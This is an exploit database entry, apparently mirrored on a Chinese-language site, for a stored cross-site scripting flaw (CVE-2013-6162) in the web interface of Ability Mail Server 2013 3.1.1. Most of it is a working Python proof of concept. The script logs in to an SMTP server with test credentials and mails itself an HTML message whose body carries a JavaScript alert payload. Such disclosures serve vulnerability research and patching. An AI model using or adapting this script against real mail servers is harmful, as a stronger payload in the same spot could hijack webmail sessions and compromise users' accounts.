Ability Mail Server 2013 3.1.1 – Web UI Persistent Cross-Site Scripting

  • 作者: David Um
    日期: 2013-12-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/30373/
  • #!/usr/bin/env python
    
    '''
    Exploit Title: Ability Mail Server 2013 Stored XSS
    Date: 12/20/2013
    Exploit Author: David Um
    Vendor Homepage: http://www.code-crafters.com/
    Software Link: http://download.code-crafters.com/ams.exe
    Version: 3.1.1
    Tested on: Windows Server 2003 SP2
    CVE : CVE-2013-6162
    Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
    '''
    
    import smtplib
    
    email_addr = 'user@hack.local'
    
    email = 'From: %s\n' % email_addr
    email += 'To: %s\n' % email_addr
    email += 'Subject: XSS\n'
    email += 'Content-type: text/html\n\n'
    email += '<script>alert("XSS")</script>'
    s = smtplib.SMTP('192.168.58.140', 25)
    
    s.login(email_addr, "user")
    s.sendmail(email_addr, email_addr, email)
    s.quit()